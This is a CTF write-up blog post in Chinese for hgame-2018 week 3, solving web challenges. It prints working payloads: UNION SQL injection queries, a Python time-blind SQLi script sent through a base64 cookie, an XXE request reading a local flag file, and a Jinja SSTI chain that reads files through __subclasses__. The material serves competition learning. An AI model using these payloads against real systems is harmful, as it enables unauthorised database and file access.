hgame-2018 CTFwp(杭电信安)week3
2018-03-04 13:43
696 查看
送分的sqli
这题没有任何过滤什么的,真的是很简单了。1 and 1=-1 union select 1,schema_name from information_schema.schemata
查看库名,得:
1 information_schema 1 test 1 week3_sqliiii2
?id=1 and 1=-1 union select 1,table_name from information_schema.tables
查表,得:
。。。 1 test 1 f111aa4g 1 users
猜测在f111aa4g里:
查列名
?id=1 and 1=-1 union select 1,column_name from information_schema.columns
1 f111aaaggg_w3 1 username
猜测在f111aaaggg_w3里。
最后payload:
http://118.25.18.223:10068/?id=-1 union select 1,f111aaaggg_w3 from f111aa4g
得到flag。
正常的SQLi
描述出题人终于换端口了 我们来一发正常的SQLi吧
URL http://123.206.203.108:10010/normalSQLi/index.php
基准分数 250
当前分数 250
完成人数 39
表哥提醒:cookie时间盲注
抓包发现cookie值:
Cookie: name=Z3Vlc3Q%3D; isadmin=0
有源码泄露:http://123.206.203.108:10010/normalSQLi/index.php.bak
<?php ..... $username = base64_decode($_COOKIE['name']); ..... $sql = "select * from user where username = '{$username}'"; $re = mysqli_query($conn, $sql); $rs = mysqli_fetch_array($re); // echo $rs['flag']; echo $username . '<br/>'; echo "因为出题人太懒了,所以现在没有任何功能"; .....
cookie的name是注入点,base64编码。
用的是表哥的脚本:
import requests import base64 import urllib url = "http://123.206.203.108:10010/normalSQLi/index.php" flag = "" for i in range(1,1000): for j in range(33,127): payload = "admin' or if((ascii(substr((select flag from user limit 2,1),%s,1))=%s),sleep(3),false)#"%(i,j) cookie = { "name":urllib.quote(base64.b64encode(payload)) } try: r = requests.get(url=url,cookies=cookie,timeout=2.5) except: flag +=chr(j) print flag break
flag: hgame{fLag_1s_h4re…..}
书店
XXE xml实体注入ENTITY 实体
在一个甚至多个XML文档中频繁使用某一条数据,我们可以预先定义一个这条数据的“别名”,即一个ENTITY,然后在这些文档中需要该数据的地方调用它。
XML定义了两种类型的ENTITY,一种在XML文档中使用,另一种作为参数在DTD文件中使用。
ENTITY的定义语法:
<!DOCTYPE 文件名 [ <!ENTITY 实体名 "实体内容"> ]>
大概看了一些文档,理解了一下,尝试:
POST /hgame/selectBook?type=dz HTTP/1.1 Host: 120.79.208.173:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/xml Referer: http://120.79.208.173:8080/hgame/index.jsp Cookie: JSESSIONID=08CEBA8F1F775DC3EA34F98711AB9D89 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 <!DOCTYPE netspi [<!ELEMENT methodname ANY><!ENTITY xxe SYSTEM "file:///a/b/flag.txt">]> <root> <search>type sth!</search> <value>&xxe;</value> </root>
但是无果。可能还是没太弄懂这个姿势。
ngc’s blog
表哥提示STTI,于是了解了一些文档。‘.class 可以访问到字符串的类型对象
使用 mro(Method Resolution Order) 直接获得对象的继承链, python用这个方法来确定对象方法解析的顺序
用 subclasses()来获得当前环境下能够访问的所有对象.
接下来的做法有点像sql注入(查表)
''.__class__
Oops! That page doesn't exist. http://111.230.105.104:5000/<type 'str'>
''.__class__.__mro__
Oops! That page doesn't exist. http://111.230.105.104:5000/(<type 'str'>, <type 'basestring'>, <type 'object'>)
找到file,
然后读取:
{{''.__class__.__mro__[2].__subclasses__()[40]('./flag', 'r').read()}}
flag: hgame{skdvhdsbvadvnjVADBVS}
相关文章推荐
- hgame-2018 CTFwp(杭电信安)week1
- hgame-2018 CTFwp(杭电信安)week2
- HITCTF 2018 wp [我真是菜鸟]
- 南邮ctf-web-wp
- WP 4 i春秋_internetwache-ctf-2016
- HGAME-2018
- Jclemo_ CTF_WEEK1~2学习总结
- HGAME-WEEK2-WRITE-UP
- WP 4 i春秋_百度杯”CTF比赛(九月第一场)
- SUSCTF|WP:CrakeMe 一道android逆向
- 2016 icectf dear_diary wp
- 强网杯2018 部分web wp
- 南邮ctf训练平台逆向试题wp
- Nuit du Hack CTF Quals 2018 writeup (web)
- IceCTF 部分WP
- HGAME-WEEK1-WRITE-UP
- WordPress Van Ons WP GDPR Compliance插件任意代码执行漏洞(CVE-2018-19207)
- 寒假第二周CTFwp——合天CTF
- CTF实验吧 这就是一个坑wp (明文攻击)
- 2018信息安全铁三测评wp